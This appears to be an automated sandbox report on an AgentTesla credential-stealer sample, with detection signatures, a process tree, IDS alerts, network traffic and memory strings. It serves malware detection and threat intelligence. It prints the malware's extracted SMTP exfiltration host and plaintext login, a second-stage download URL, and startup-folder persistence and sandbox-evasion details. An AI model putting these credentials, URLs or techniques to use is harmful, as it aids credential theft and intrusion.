Windows Analysis Report
Ref#1550238.exe

Overview

General Information

Sample name: Ref#1550238.exe
Analysis ID: 1567423
MD5: a31bcf203bb60f13de83211ac9d44d06
SHA1: 8d559c68b94f38e6886f467080cbce53a2ae1654
SHA256: bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
Tags: exe, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#1550238.exe (PID: 4920 cmdline: "C:\Users\user\Desktop\Ref#1550238.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
    • InstallUtil.exe (PID: 5520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6992 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 6740 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
      • InstallUtil.exe (PID: 3908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Ref#1550238.exe.6ab0000.8.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.Ref#1550238.exe.3a34098.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Ref#1550238.exe.3a34098.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.Ref#1550238.exe.3a34098.4.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (listed below)
  • 0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Ref#1550238.exe.3843d28.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6992, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 5520, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49713
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6992, ProcessName: wscript.exe

                      Data Obfuscation

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#1550238.exe, ProcessId: 4920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T15:17:46.883614+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP
2024-12-03T15:18:23.121832+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP
2024-12-03T15:16:09.896860+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP
2024-12-03T15:16:46.430602+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP
2024-12-03T15:16:09.896860+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP
2024-12-03T15:16:46.430602+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP
2024-12-03T15:17:46.883614+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 162.254.34.31 | 587 | TCP
2024-12-03T15:18:23.121832+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 162.254.34.31 | 587 | TCP

                      AV Detection

                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeReversingLabs: Detection: 44%
                      Source: Ref#1550238.exeReversingLabs: Detection: 44%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeJoe Sandbox ML: detected
                      Source: Ref#1550238.exeJoe Sandbox ML: detected
                      Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49719 version: TLS 1.2
                      Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EA80
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EA71
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B88AE5h0_2_06B88898
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B88AE5h0_2_06B88888
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B884FAh0_2_06B880F8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B884FAh0_2_06B880EA
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EDEE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8ED08
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEDEE
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BED08
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEA80
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEA71
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B8AE5h5_2_069B8898
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B8AE5h5_2_069B8888
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B84FAh5_2_069B80F8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B84FAh5_2_069B80EA

                      Networking

                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.00000000036A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/EqqP
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49719 version: TLS 1.2

                      System Summary

                      Source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B02D0 NtProtectVirtualMemory,0_2_063B02D0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B2820 NtResumeThread,0_2_063B2820
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B02CA NtProtectVirtualMemory,0_2_063B02CA
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B2818 NtResumeThread,0_2_063B2818
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B80A68 NtResumeThread,5_2_05B80A68
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B80A60 NtResumeThread,5_2_05B80A60
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9EE70 NtProtectVirtualMemory,5_2_05B9EE70
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9EE69 NtProtectVirtualMemory,5_2_05B9EE69
                      Source: Ref#1550238.exeStatic PE information: invalid certificate
                      Source: Ref#1550238.exe, 00000000.00000002.2508714224.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#1550238.exe
